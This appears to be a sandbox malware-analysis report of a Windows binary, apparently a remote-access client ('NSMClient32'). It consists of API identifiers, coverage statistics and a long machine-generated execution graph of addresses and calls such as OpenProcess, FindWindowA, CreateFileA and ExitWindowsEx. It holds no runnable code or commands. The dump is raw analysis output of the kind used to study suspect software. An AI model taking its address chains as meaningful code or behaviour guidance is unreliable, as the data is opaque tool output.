                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                        • String ID: csm
                                                                                        • API String ID: 2573137834-1018135373
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6FE19E95F,?,?,?,00007FF6FE19463A,?,?,?), ref: 00007FF6FE19EA63
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6FE19E95F,?,?,?,00007FF6FE19463A,?,?,?), ref: 00007FF6FE19EA6E
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ErrorLastObjectSingleWait
                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                        • API String ID: 1211598281-2248577382
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: FindHandleModuleResource
                                                                                        • String ID: RTL
                                                                                        • API String ID: 3537982541-834975271

Execution Graph

Execution Coverage: 6.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 14.7%
Total number of Nodes: 2000
Total number of Limit Nodes: 102
1110f4a0 54668->54810 54817 11027850 GetProcAddress SetLastError 54668->54817 54669 110298f1 GetProcAddress 54671 11029918 SetLastError 54669->54671 54669->54673 54818 110278a0 GetProcAddress SetLastError 54670->54818 54672 11029922 GetLastError 54671->54672 54672->54673 54674 1102993d GetProcAddress 54672->54674 54673->54627 54673->54628 54673->54629 54673->54630 54673->54634 54673->54636 54673->54637 54673->54641 54673->54650 54673->54651 54673->54656 54673->54657 54673->54658 54673->54663 54673->54664 54673->54669 54673->54672 54676 11029975 GetLastError 54673->54676 54677 1102998c GetDesktopWindow 54673->54677 54674->54673 54675 1102996d SetLastError 54674->54675 54675->54676 54676->54673 54676->54677 54677->54673 54678 1102999a GetProcAddress 54677->54678 54678->54673 54679 110299d6 SetLastError 54678->54679 54679->54673 54680->54478 54682 1114229a 54681->54682 54683 1114229c 54681->54683 54682->54484 54684 1110f4a0 std::locale::facet::_Facet_Register 307 API calls 54683->54684 54685 111422c2 54684->54685 54686 111422cb _strncpy 54685->54686 54687 111422e9 54685->54687 54686->54484 54821 11029450 307 API calls 2 library calls 54687->54821 54690->54484 54822 110d05c0 54691->54822 54694 110d07e9 _free 54694->54462 54695 110d07d2 54826 11029450 307 API calls 2 library calls 54695->54826 54698->54463 54699->54466 54705 110d148c 54704->54705 54706 110d14a7 54705->54706 54707 110d1490 54705->54707 54720 110d0190 54706->54720 54749 11029450 307 API calls 2 library calls 54707->54749 54714 110d14de 54714->54607 54714->54608 54715 110d14c7 54750 11029450 307 API calls 2 library calls 54715->54750 54721 110d0199 54720->54721 54722 110d019d 54721->54722 54723 110d01b4 54721->54723 54751 11029450 307 API calls 2 library calls 54722->54751 54725 110d01b1 54723->54725 54726 110d01e8 54723->54726 54725->54723 54752 11029450 307 API calls 2 library calls 54725->54752 54728 110d01e5 54726->54728 54729 110d0206 54726->54729 54728->54726 54753 11029450 307 API calls 2 library 
calls 54728->54753 54732 110d1090 54729->54732 54733 110d109e 54732->54733 54734 110d10a2 54733->54734 54738 110d10b9 54733->54738 54754 11029450 307 API calls 2 library calls 54734->54754 54736 110d1160 54736->54714 54736->54715 54737 110d10ec 54737->54736 54756 110d09e0 307 API calls std::locale::facet::_Facet_Register 54737->54756 54738->54737 54739 110d10b6 54738->54739 54739->54738 54755 11029450 307 API calls 2 library calls 54739->54755 54742 110d1113 54745 110d111f _memmove 54742->54745 54757 110d0920 307 API calls std::locale::facet::_Facet_Register 54742->54757 54745->54736 54746 110d1149 54745->54746 54758 11029450 307 API calls 2 library calls 54746->54758 54756->54742 54757->54745 54760 110d072f 54759->54760 54761 11163d09 _strlen 54759->54761 54767 110d0450 54760->54767 54762 11162b51 _malloc 67 API calls 54761->54762 54763 11163d1c 54762->54763 54763->54760 54785 1116be9f 54763->54785 54768 110d045b 54767->54768 54769 110d0472 54767->54769 54806 11029450 307 API calls 2 library calls 54768->54806 54772 110cfe70 54769->54772 54773 110cfe7d 54772->54773 54774 110cfe98 54773->54774 54775 110cfe81 54773->54775 54777 110cfe95 54774->54777 54779 110cfeb6 54774->54779 54807 11029450 307 API calls 2 library calls 54775->54807 54777->54774 54808 11029450 307 API calls 2 library calls 54777->54808 54780 110cfeb3 54779->54780 54783 110cfed9 54779->54783 54780->54779 54809 11029450 307 API calls 2 library calls 54780->54809 54783->54622 54783->54623 54786 1116beb4 54785->54786 54787 1116bead 54785->54787 54797 111692ef 67 API calls __getptd_noexit 54786->54797 54787->54786 54790 1116bed2 54787->54790 54791 11163d2e 54790->54791 54799 111692ef 67 API calls __getptd_noexit 54790->54799 54791->54760 54794 1116deb2 54791->54794 54793 1116beb9 54798 1116df04 11 API calls __filbuf 54793->54798 54800 1116dd89 54794->54800 54797->54793 54798->54791 54799->54793 54801 1116dda8 _memset __call_reportfault 54800->54801 54802 1116ddc6 IsDebuggerPresent 
SetUnhandledExceptionFilter UnhandledExceptionFilter 54801->54802 54803 1116de94 __call_reportfault 54802->54803 54804 11161d01 __87except 5 API calls 54803->54804 54805 1116deb0 GetCurrentProcess TerminateProcess 54804->54805 54805->54760 54811 11162b51 _malloc 67 API calls 54810->54811 54812 1110f4ae 54811->54812 54813 1110f4b7 54812->54813 54814 1110f4ce _memset 54812->54814 54820 11029450 307 API calls 2 library calls 54813->54820 54814->54668 54817->54668 54818->54653 54819->54659 54823 110d05d9 54822->54823 54824 110d05ec 54822->54824 54823->54824 54825 110d0450 307 API calls 54823->54825 54824->54694 54824->54695 54825->54824 54828 1109e930 GetTokenInformation 54827->54828 54833 1109e9c6 54827->54833 54830 1109e952 __crtLCMapStringA_stat 54828->54830 54829 11161d01 __87except 5 API calls 54831 1109e9d8 54829->54831 54832 1109e958 GetTokenInformation 54830->54832 54830->54833 54831->54316 54832->54833 54834 1109e96a 54832->54834 54833->54829 54835 1109e99f EqualSid 54834->54835 54836 1109e973 AllocateAndInitializeSid 54834->54836 54835->54833 54837 1109e9ad 54835->54837 54836->54833 54836->54835 54838 11161d01 __87except 5 API calls 54837->54838 54839 1109e9c2 54838->54839 54839->54316 54841 1114302a 54840->54841 54841->54333 54843 11163a4d 54842->54843 54844 11163a3b 54842->54844 54848 111639dc 106 API calls _LocaleUpdate::_LocaleUpdate 54843->54848 54844->54337 54846 11163a57 54846->54337 54847->54332 54848->54846 54849->54352 54850 11115b70 54868 11145320 54850->54868 54853 11115bb5 54854 11115b98 54853->54854 54855 11115bc4 CoInitialize CoCreateInstance 54853->54855 54856 11161d01 __87except 5 API calls 54854->54856 54858 11115bf4 LoadLibraryA 54855->54858 54867 11115be9 54855->54867 54859 11115ba6 54856->54859 54857 111450a0 std::locale::facet::_Facet_Register 121 API calls 54857->54853 54860 11115c10 GetProcAddress 54858->54860 54858->54867 54863 11115c20 SHGetSettings 54860->54863 54864 11115c34 FreeLibrary 54860->54864 54861 11115cd1 CoUninitialize 
54862 11115cd7 54861->54862 54865 11161d01 __87except 5 API calls 54862->54865 54863->54864 54864->54867 54866 11115ce6 54865->54866 54867->54861 54867->54862 54869 111450a0 std::locale::facet::_Facet_Register 121 API calls 54868->54869 54870 11115b8e 54869->54870 54870->54853 54870->54854 54870->54857 54871 11173a35 54894 1116b7b5 54871->54894 54873 11173a52 _LcidFromHexString 54874 11173a5f GetLocaleInfoA 54873->54874 54875 11173a86 54874->54875 54876 11173a92 54874->54876 54879 11161d01 __87except 5 API calls 54875->54879 54899 111646ce 107 API calls 2 library calls 54876->54899 54878 11173a9e 54881 11173aa8 GetLocaleInfoA 54878->54881 54892 11173ad8 _CountryEnumProc@4 _strlen 54878->54892 54880 11173c02 54879->54880 54881->54875 54882 11173ac7 54881->54882 54900 111646ce 107 API calls 2 library calls 54882->54900 54883 11173b4b GetLocaleInfoA 54883->54875 54885 11173b6e 54883->54885 54902 111646ce 107 API calls 2 library calls 54885->54902 54886 11173ad2 54886->54892 54901 11163784 108 API calls 2 library calls 54886->54901 54888 11173b79 54888->54875 54891 11173b81 _strlen 54888->54891 54903 111646ce 107 API calls 2 library calls 54888->54903 54891->54875 54904 111739da GetLocaleInfoW _GetPrimaryLen _strlen 54891->54904 54892->54875 54892->54883 54905 1116b73c GetLastError 54894->54905 54896 1116b7bd 54897 1116b7ca 54896->54897 54917 1116d7aa 67 API calls 3 library calls 54896->54917 54897->54873 54899->54878 54900->54886 54901->54892 54902->54888 54903->54891 54904->54875 54918 1116b5fa TlsGetValue 54905->54918 54908 1116b7a9 SetLastError 54908->54896 54911 1116b76f DecodePointer 54912 1116b784 54911->54912 54913 1116b7a0 _free 54912->54913 54914 1116b788 54912->54914 54913->54908 54927 1116b688 67 API calls 4 library calls 54914->54927 54916 1116b790 GetCurrentThreadId 54916->54908 54919 1116b60f DecodePointer TlsSetValue 54918->54919 54920 1116b62a 54918->54920 54919->54920 54920->54908 54921 11169dbe 54920->54921 54923 11169dc7 54921->54923 54924 11169e04 
54923->54924 54925 11169de5 Sleep 54923->54925 54928 11170166 54923->54928 54924->54908 54924->54911 54926 11169dfa 54925->54926 54926->54923 54926->54924 54927->54916 54929 11170172 54928->54929 54930 1117018d 54928->54930 54929->54930 54931 1117017e 54929->54931 54932 111701a0 RtlAllocateHeap 54930->54932 54934 111701c7 54930->54934 54938 1116d4a8 DecodePointer 54930->54938 54937 111692ef 67 API calls __getptd_noexit 54931->54937 54932->54930 54932->54934 54934->54923 54935 11170183 54935->54923 54937->54935 54938->54930 54939 1102e640 54940 1102e683 54939->54940 54941 1110f420 std::locale::facet::_Facet_Register 307 API calls 54940->54941 54942 1102e68a 54941->54942 54949 1102e701 54942->54949 55906 11081bb0 54942->55906 54944 1102e6e6 54945 11081bb0 115 API calls 54944->54945 54945->54949 54946 1102e766 54947 1102e7e5 CreateEventA 54946->54947 54948 1102e7bf GetSystemMetrics 54946->54948 54955 1102e805 54947->54955 54956 1102e819 54947->54956 54948->54947 54950 1102e7ce 54948->54950 54949->54946 54953 111450a0 std::locale::facet::_Facet_Register 121 API calls 54949->54953 54951 11146450 std::locale::facet::_Facet_Register 21 API calls 54950->54951 54954 1102e7d8 54951->54954 54953->54946 55916 1102d330 54954->55916 56055 11029450 307 API calls 2 library calls 54955->56055 54959 1110f420 std::locale::facet::_Facet_Register 307 API calls 54956->54959 54960 1102e820 54959->54960 54961 1102e840 54960->54961 54962 111100d0 451 API calls 54960->54962 54963 1110f420 std::locale::facet::_Facet_Register 307 API calls 54961->54963 54962->54961 54964 1102e854 54963->54964 54965 111100d0 451 API calls 54964->54965 54966 1102e874 54964->54966 54965->54966 54967 1110f420 std::locale::facet::_Facet_Register 307 API calls 54966->54967 54968 1102e8f3 54967->54968 54969 1110f420 std::locale::facet::_Facet_Register 307 API calls 54968->54969 54973 1102e93d 54969->54973 54970 1102e966 FindWindowA 54971 1102eab7 54970->54971 54972 1102e99b 54970->54972 55315 110613d0 54971->55315 
54972->54971 54976 1102e9b3 GetWindowThreadProcessId 54972->54976 54973->54970 54978 11146450 std::locale::facet::_Facet_Register 21 API calls 54976->54978 54977 110613d0 309 API calls 54979 1102ead5 54977->54979 54980 1102e9d9 OpenProcess 54978->54980 54981 110613d0 309 API calls 54979->54981 54980->54971 54982 1102e9f9 54980->54982 54983 1102eae1 54981->54983 54989 11146450 std::locale::facet::_Facet_Register 21 API calls 54982->54989 54984 1102eaf8 54983->54984 54985 1102eaef 54983->54985 55322 11145910 54984->55322 56056 11027d60 148 API calls 2 library calls 54985->56056 54987 1102eaf4 54987->54984 54991 1102ea2c 54989->54991 54990 1102eb07 55337 11143230 54990->55337 54992 1102ea6b CloseHandle FindWindowA 54991->54992 54995 11146450 std::locale::facet::_Facet_Register 21 API calls 54991->54995 54993 1102ea93 GetWindowThreadProcessId 54992->54993 54994 1102eaa7 54992->54994 54993->54994 54996 11146450 std::locale::facet::_Facet_Register 21 API calls 54994->54996 54997 1102ea3e SendMessageA WaitForSingleObject 54995->54997 54998 1102eab4 54996->54998 54997->54992 55000 1102ea5e 54997->55000 54998->54971 55001 11146450 std::locale::facet::_Facet_Register 21 API calls 55000->55001 55003 1102ea68 55001->55003 55002 1102eb2a 55004 1102ec01 55002->55004 55348 11062d60 55002->55348 55003->54992 55363 110274c0 55004->55363 55008 110b7920 std::locale::facet::_Facet_Register 9 API calls 55009 1102eb5e 55008->55009 55011 11146450 std::locale::facet::_Facet_Register 21 API calls 55009->55011 55010 1102ec26 55020 1102ec41 55010->55020 55382 1102a620 55010->55382 55013 1102eb70 55011->55013 55016 1102ebb2 55013->55016 56057 11061a40 106 API calls 55013->56057 55016->55004 55030 1102ebc5 55016->55030 55018 1102a620 std::locale::facet::_Facet_Register 174 API calls 55018->55020 55385 110281a0 55020->55385 55021 1102eb87 55021->55016 56058 11061a60 174 API calls std::locale::facet::_Facet_Register 55021->56058 55022 111414a0 842 API calls 55024 1102ec62 55022->55024 55408 
1102db00 55024->55408 55027 1102eb92 55027->55016 55030->55004 55032 1102d330 791 API calls 55030->55032 56059 11027d60 148 API calls 2 library calls 55030->56059 56060 110f6080 145 API calls 2 library calls 55030->56060 55032->55016 55316 11061446 55315->55316 55321 110613f7 55315->55321 55317 11161d01 __87except 5 API calls 55316->55317 55319 1102eac9 55317->55319 55319->54977 55320 11081bb0 115 API calls 55320->55321 55321->55316 55321->55320 56113 110612f0 309 API calls 3 library calls 55321->56113 56114 11144bd0 55322->56114 55325 11144bd0 std::locale::facet::_Facet_Register 307 API calls 55326 11145947 wsprintfA 55325->55326 55327 11143230 std::locale::facet::_Facet_Register 8 API calls 55326->55327 55328 11145964 55327->55328 55329 11145990 55328->55329 55330 11143230 std::locale::facet::_Facet_Register 8 API calls 55328->55330 55331 11161d01 __87except 5 API calls 55329->55331 55332 11145979 55330->55332 55333 1114599c 55331->55333 55332->55329 55334 11145980 55332->55334 55333->54990 55335 11161d01 __87except 5 API calls 55334->55335 55336 1114598c 55335->55336 55336->54990 55338 11143251 CreateFileA 55337->55338 55340 111432ee CloseHandle 55338->55340 55341 111432ce 55338->55341 55344 11161d01 __87except 5 API calls 55340->55344 55342 111432d2 CreateFileA 55341->55342 55343 1114330b 55341->55343 55342->55340 55342->55343 55346 11161d01 __87except 5 API calls 55343->55346 55345 11143307 55344->55345 55345->55002 55347 1114331a 55346->55347 55347->55002 55349 1105dd10 106 API calls 55348->55349 55350 11062d88 55349->55350 56160 11061c90 55350->56160 55352 1102eb51 55352->55004 55352->55008 55354 1105de40 5 API calls 55355 11062de9 55354->55355 55356 1105dd10 106 API calls 55355->55356 55357 11062e1d 55356->55357 55359 1105de40 5 API calls 55357->55359 55361 11062e3c 55357->55361 55358 1105dd10 106 API calls 55360 11062e6c 55358->55360 55359->55361 55360->55352 55362 1105de40 5 API calls 55360->55362 55361->55358 55362->55352 55364 110274f4 55363->55364 
55365 1105dd10 106 API calls 55364->55365 55366 11027509 55365->55366 55367 1102755f LoadIconA 55366->55367 55371 11145320 std::locale::facet::_Facet_Register 121 API calls 55366->55371 55380 110275d8 55366->55380 55368 11027571 55367->55368 55369 1102757a GetSystemMetrics GetSystemMetrics LoadImageA 55367->55369 55368->55369 55373 110275b3 55369->55373 55374 1102759f LoadIconA 55369->55374 55370 1102768c 55375 11161d01 __87except 5 API calls 55370->55375 55372 11027542 LoadLibraryExA 55371->55372 55372->55367 55372->55374 55377 110275b7 GetSystemMetrics GetSystemMetrics LoadImageA 55373->55377 55373->55380 55374->55373 55378 11027699 55375->55378 55377->55380 55378->55010 55379 11081bb0 115 API calls 55379->55380 55380->55370 55380->55379 55381 111450a0 std::locale::facet::_Facet_Register 121 API calls 55380->55381 56863 110612f0 309 API calls 3 library calls 55380->56863 55381->55380 56864 110285f0 55382->56864 55384 1102a62e 55384->55018 55386 11146450 std::locale::facet::_Facet_Register 21 API calls 55385->55386 55387 110281c6 55386->55387 55388 110282b4 55387->55388 55389 110281dd GetModuleFileNameA 55387->55389 56887 11013830 22 API calls 2 library calls 55388->56887 55391 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 55389->55391 55392 11028201 55391->55392 55394 1102820e wsprintfA 55392->55394 55395 110282cd 55392->55395 55393 110282c7 55393->55395 55397 11028242 55394->55397 55396 11146450 std::locale::facet::_Facet_Register 21 API calls 55395->55396 55398 110282db LoadLibraryExA 55396->55398 55397->55395 55399 1102824a WaitForSingleObject GetExitCodeProcess 55397->55399 55403 11028334 55398->55403 55404 1102831b GetModuleHandleA 55398->55404 55400 11028277 wsprintfA 55399->55400 55401 1102829a CloseHandle CloseHandle 55399->55401 55400->55401 55401->55395 55406 11161d01 __87except 5 API calls 55403->55406 55405 11028331 ___DllMainCRTStartup 55404->55405 55405->55403 55407 11028343 55406->55407 55407->55022 55407->55024 55907 11081bbd 
55906->55907 55908 11081bc2 55906->55908 57817 11081990 IsDBCSLeadByte 55907->57817 55910 11081bcb 55908->55910 55915 11081bdf 55908->55915 57818 111646ce 107 API calls 2 library calls 55910->57818 55912 11081bd8 55912->54944 55913 11081c43 55913->54944 55914 11165797 112 API calls std::locale::facet::_Facet_Register 55914->55915 55915->55913 55915->55914 55917 11146450 std::locale::facet::_Facet_Register 21 API calls 55916->55917 55918 1102d36c 55917->55918 55919 11145320 std::locale::facet::_Facet_Register 121 API calls 55918->55919 55920 1102d374 55919->55920 55921 1102d3a9 GetCurrentProcess SetPriorityClass 55920->55921 55922 1102d37d InterlockedIncrement 55920->55922 55925 1102d3dd 55921->55925 55922->55921 55923 1102d38c 55922->55923 55924 11146450 std::locale::facet::_Facet_Register 21 API calls 55923->55924 55926 1102d396 55924->55926 55927 1102d3e6 SetEvent 55925->55927 55930 1102d3ed 55925->55930 55928 1102d3a0 Sleep 55926->55928 55927->55930 55928->55928 55929 1102d424 55934 1102d452 55929->55934 57838 1109f1d0 313 API calls std::locale::facet::_Facet_Register 55929->57838 55930->55929 57836 11029370 313 API calls std::locale::facet::_Facet_Register 55930->57836 55933 1102d40d 57837 110ff6c0 312 API calls std::locale::facet::_Facet_Register 55933->57837 57819 11028090 SetEvent 55934->57819 55937 1102d468 55938 1102d47d 55937->55938 57839 110ec980 327 API calls 55937->57839 55940 1102d49f 55938->55940 57840 110594a0 SetEvent 55938->57840 55942 1102d4de 55940->55942 55944 1102d4b3 Sleep 55940->55944 55943 11146450 std::locale::facet::_Facet_Register 21 API calls 55942->55943 55945 1102d4e8 55943->55945 55944->55942 55946 1102d518 55945->55946 55948 1105dd10 106 API calls 55945->55948 55949 1102d58a 55946->55949 55950 1102d53f 55946->55950 55948->55946 55956 1102d5a9 55949->55956 55962 1102d5cb 55949->55962 57820 110affa0 55950->57820 55954 1102d613 55958 1102d62d 55954->55958 55968 11146450 std::locale::facet::_Facet_Register 21 API calls 55954->55968 
55957 1102d5af PostThreadMessageA 55956->55957 55956->55962 57843 1110f3a0 WaitForSingleObject 55957->57843 55964 1102d66b 55958->55964 55965 1102d65c 55958->55965 55959 1102d5f0 57845 11059400 DeleteCriticalSection CloseHandle 55959->57845 55962->55954 55962->55959 57844 1110f3a0 WaitForSingleObject 55962->57844 55963 1102d56a 55970 1102d57d 55963->55970 57842 111352b0 338 API calls 4 library calls 55963->57842 55967 1102d681 55964->55967 55972 11075d10 355 API calls 55964->55972 57846 11105420 26 API calls std::locale::facet::_Facet_Register 55965->57846 55973 11146450 std::locale::facet::_Facet_Register 21 API calls 55967->55973 55968->55958 57865 1100d4e0 FreeLibrary 55970->57865 55972->55967 55977 1102d68b 55973->55977 55976 1102d661 57847 11107b50 556 API calls std::locale::facet::_Facet_Register 55976->57847 55980 1113cc30 342 API calls 55977->55980 55978 1102d889 55981 1102d8a0 55978->55981 57866 1100d200 wsprintfA 55978->57866 55984 1102d690 55980->55984 55989 1102d8c7 GetModuleFileNameA GetFileAttributesA 55981->55989 56003 1102d9fa 55981->56003 55982 1102d666 57848 11105ac0 71 API calls std::locale::facet::_Facet_Register 55982->57848 55987 11146450 std::locale::facet::_Facet_Register 21 API calls 55984->55987 55990 1102d69a 55987->55990 55988 1102d895 55991 11146450 std::locale::facet::_Facet_Register 21 API calls 55988->55991 55992 1102d8ef 55989->55992 55989->56003 55994 1102d6b7 55990->55994 55995 1102d6a9 55990->55995 55991->55981 55997 1110f420 std::locale::facet::_Facet_Register 307 API calls 55992->55997 55993 11146450 std::locale::facet::_Facet_Register 21 API calls 55998 1102da92 55993->55998 55996 11146450 std::locale::facet::_Facet_Register 21 API calls 55994->55996 57849 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 55995->57849 56000 1102d6c1 55996->56000 56025 1102d8f6 55997->56025 57869 11146410 FreeLibrary 55998->57869 56007 1102d6d5 56000->56007 57850 1110e5c0 DeleteCriticalSection 56000->57850 56003->55993 56004 
1102da9a 56006 1102dad6 56004->56006 56011 1102dac4 ExitWindowsEx 56004->56011 56012 1102dab4 ExitWindowsEx Sleep 56004->56012 56008 1102dae6 56006->56008 56009 1102dadb Sleep 56006->56009 56010 1102d74f 56007->56010 57851 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 56007->57851 56014 11146450 std::locale::facet::_Facet_Register 21 API calls 56008->56014 56009->56008 56015 1102d75b 56010->56015 56016 1102d769 56010->56016 56011->56006 56012->56011 56020 1102daf0 ExitProcess 56014->56020 57853 1110fc70 320 API calls std::locale::facet::_Facet_Register 56015->57853 56019 1102d7e2 56016->56019 56032 1102d760 56016->56032 56022 11146450 std::locale::facet::_Facet_Register 21 API calls 56019->56022 56023 1102d7ec 56022->56023 56026 1102d7fb 56023->56026 56027 1102d809 CloseHandle 56023->56027 56024 1102d9e3 56024->56003 56025->56024 56028 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 56025->56028 57855 1108a570 56026->57855 56033 1102d824 _free 56027->56033 56034 1102d82d 56027->56034 56031 1102d953 56028->56031 56029 11146450 std::locale::facet::_Facet_Register 21 API calls 56046 1102d6ff 56029->56046 56036 1102d96e _memset 56031->56036 57867 11029450 307 API calls 2 library calls 56031->57867 56032->56016 56032->56019 57854 1110fc70 320 API calls std::locale::facet::_Facet_Register 56032->57854 56033->56034 56053 1102d869 56034->56053 57862 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 56034->57862 56035 1102d800 56035->56027 56039 1102d988 FindFirstFileA 56036->56039 56041 1102d9d4 56039->56041 56042 1102d9a8 FindNextFileA 56039->56042 56040 1102d83c 56044 1102d840 _free 56040->56044 56045 1102d858 56040->56045 57868 111266e0 333 API calls 5 library calls 56041->57868 56054 1102d9c8 FindClose 56042->56054 57863 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 56044->57863 56045->56053 57864 1110fc70 320 API calls std::locale::facet::_Facet_Register 56045->57864 56046->56010 
56046->56029 57852 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 56046->57852 56047 1102d7d9 56047->56019 56053->55970 56054->56041 56056->54987 56057->55021 56058->55027 56059->55030 56060->55030 56113->55321 56115 11144bf2 56114->56115 56118 11144c09 std::locale::facet::_Facet_Register 56114->56118 56157 11029450 307 API calls 2 library calls 56115->56157 56121 11144c3c GetModuleFileNameA 56118->56121 56130 11144d97 56118->56130 56119 11161d01 __87except 5 API calls 56120 11144db3 wsprintfA 56119->56120 56120->55325 56138 11081b40 56121->56138 56123 11144c51 56124 11144c61 SHGetFolderPathA 56123->56124 56125 11144d48 56123->56125 56126 11144c8e 56124->56126 56127 11144cad SHGetFolderPathA 56124->56127 56128 11142290 std::locale::facet::_Facet_Register 304 API calls 56125->56128 56126->56127 56131 11144c94 56126->56131 56132 11144ce2 56127->56132 56128->56130 56130->56119 56158 11029450 307 API calls 2 library calls 56131->56158 56135 1102a620 std::locale::facet::_Facet_Register 174 API calls 56132->56135 56136 11144cf3 56135->56136 56142 11144670 56136->56142 56139 11081b53 _strrchr 56138->56139 56141 11081b6a std::locale::facet::_Facet_Register 56139->56141 56159 11081990 IsDBCSLeadByte 56139->56159 56141->56123 56143 111446fa 56142->56143 56144 1114467b 56142->56144 56143->56125 56144->56143 56145 1114468b GetFileAttributesA 56144->56145 56146 111446a5 56145->56146 56147 11144697 56145->56147 56148 11163cf8 __strdup 67 API calls 56146->56148 56147->56125 56149 111446ac 56148->56149 56150 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 56149->56150 56151 111446b6 56150->56151 56152 11144670 std::locale::facet::_Facet_Register 68 API calls 56151->56152 56156 111446d6 56151->56156 56153 111446c6 56152->56153 56154 111446dc _free CreateDirectoryA 56153->56154 56155 111446ce _free 56153->56155 56154->56156 56155->56156 56156->56125 56159->56141 56266 11144ea0 56160->56266 56162 11061d1c 56163 110d1550 307 API calls 56162->56163 
56165 11061d30 56163->56165 56164 11061d44 56166 11062c88 56164->56166 56168 11163db7 std::locale::facet::_Facet_Register 132 API calls 56164->56168 56165->56164 56167 11061f17 56165->56167 56274 1116449d 56165->56274 56170 110d07c0 308 API calls 56166->56170 56169 1116449d _fgets 81 API calls 56167->56169 56168->56166 56172 11061f31 56169->56172 56203 11061e11 56170->56203 56178 11061f97 _strpbrk 56172->56178 56179 11061f38 56172->56179 56173 11061dc7 56174 11061dce 56173->56174 56187 11061e1d _strpbrk std::locale::facet::_Facet_Register 56173->56187 56175 11061e03 56174->56175 56309 11163db7 56174->56309 56177 110d07c0 308 API calls 56175->56177 56177->56203 56293 11163676 56178->56293 56180 11061f7d 56179->56180 56184 11163db7 std::locale::facet::_Facet_Register 132 API calls 56179->56184 56181 110d07c0 308 API calls 56180->56181 56181->56203 56183 11161d01 __87except 5 API calls 56185 11062cbf 56183->56185 56184->56180 56185->55352 56185->55354 56185->55355 56186 1116449d _fgets 81 API calls 56220 11061fc1 _strpbrk std::locale::facet::_Facet_Register 56186->56220 56187->56167 56192 11061eb8 56187->56192 56189 110623fa 56193 11061efd 56192->56193 56197 11163db7 std::locale::facet::_Facet_Register 132 API calls 56192->56197 56194 110d07c0 308 API calls 56193->56194 56194->56203 56197->56193 56203->56183 56205 11081a70 IsDBCSLeadByte 56205->56220 56212 11025b80 132 API calls 56212->56203 56214 11142290 std::locale::facet::_Facet_Register 307 API calls 56214->56220 56215 11062205 56321 11025b80 56215->56321 56220->56164 56220->56186 56220->56189 56220->56205 56220->56214 56220->56215 56221 11081bb0 115 API calls 56220->56221 56223 11062368 GetTickCount CheckLicenseString wsprintfA 56220->56223 56228 11145b40 4 API calls 56220->56228 56256 110625cc 56220->56256 56325 11081df0 68 API calls 3 library calls 56220->56325 56221->56220 56227 110623b0 std::locale::facet::_Facet_Register 56223->56227 56227->56220 56228->56220 56256->56212 56271 11144eb3 56266->56271 56268 
[Execution Graph: Joe Sandbox call-graph export (node ids, code addresses and "->" edges) that does not render as text; only the function and API names attached to the graph nodes are recoverable.]

Windows API names appearing on the graph nodes: GetLastError, Sleep, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, CloseHandle, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleW, GetCommandLineA, GetStartupInfoA, GetStartupInfoW, ExitProcess, LoadLibraryA, FreeLibrary, GetProcAddress, SetLastError, OpenProcess, OpenProcessToken, GetTokenInformation, K32GetProcessImageFileNameA, K32GetProcessMemoryInfo, GetProcessHandleCount, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetFileAttributesA, SetUnhandledExceptionFilter, GetTickCount, GetLocalTime, GetSystemTimeAsFileTime, QueryPerformanceCounter, WaitForSingleObject, WaitForMultipleObjects, SetEvent, ResetEvent, CoInitialize, CoUninitialize, CoInitializeSecurity, CoCreateInstance, SysAllocString, SysFreeString, wsprintfA, wsprintfW, SendMessageTimeoutA, PostMessageA, FindWindowA, IsWindow, IsWindowVisible, IsIconic, GetParent, GetForegroundWindow, SetForegroundWindow, EnableWindow, SetWindowTextA, IsDBCSLeadByte, InterlockedIncrement, InterlockedDecrement, RegCloseKey, HeapCreate, HeapDestroy, DecodePointer, TlsFree.

Other node labels are CRT internals (for example __mtinitlocknum, __getptd_noexit, __filbuf, _malloc, _free, _calloc, _strrchr, __strdup, __87except, __CRT_INIT@12, ___DllMainCRTStartup, std::locale::facet::_Facet_Register) and one symbol, _NSMClient32, at the entry point reached from GetCommandLineA / GetStartupInfoA / GetModuleHandleA before ExitProcess.
58806 1116950a 58867 1116b64b DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 58806->58867 58807->58796 58868 1117140e DeleteCriticalSection _free 58807->58868 58808->58807 58811 11169523 58808->58811 58809 111695e4 GetCurrentThreadId 58809->58796 58862 1116d5ae 58811->58862 58815 1110f7d0 58814->58815 58816 1110f7f1 58815->58816 58817 1110f7dc 58815->58817 58818 1110f804 ___DllMainCRTStartup 58815->58818 58882 1110f720 58816->58882 58817->58818 58820 1110f720 ___DllMainCRTStartup 7 API calls 58817->58820 58818->58760 58822 1110f7e5 58820->58822 58821 1110f7f8 58821->58760 58822->58760 58823->58777 58825 1116b980 58824->58825 58826 1116b989 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58824->58826 58876 1116b64b DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 58825->58876 58827 1116b9d3 TlsAlloc 58826->58827 58831 1116bae2 58827->58831 58832 1116ba21 TlsSetValue 58827->58832 58829 1116b985 58829->58785 58831->58785 58832->58831 58833 1116ba32 58832->58833 58877 1116d557 EncodePointer EncodePointer __init_pointers _raise __initp_misc_winsig 58833->58877 58835 1116ba37 EncodePointer EncodePointer EncodePointer EncodePointer 58878 111735c2 InitializeCriticalSectionAndSpinCount 58835->58878 58837 1116ba76 58838 1116badd 58837->58838 58839 1116ba7a DecodePointer 58837->58839 58880 1116b64b DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 58838->58880 58841 1116ba8f 58839->58841 58841->58838 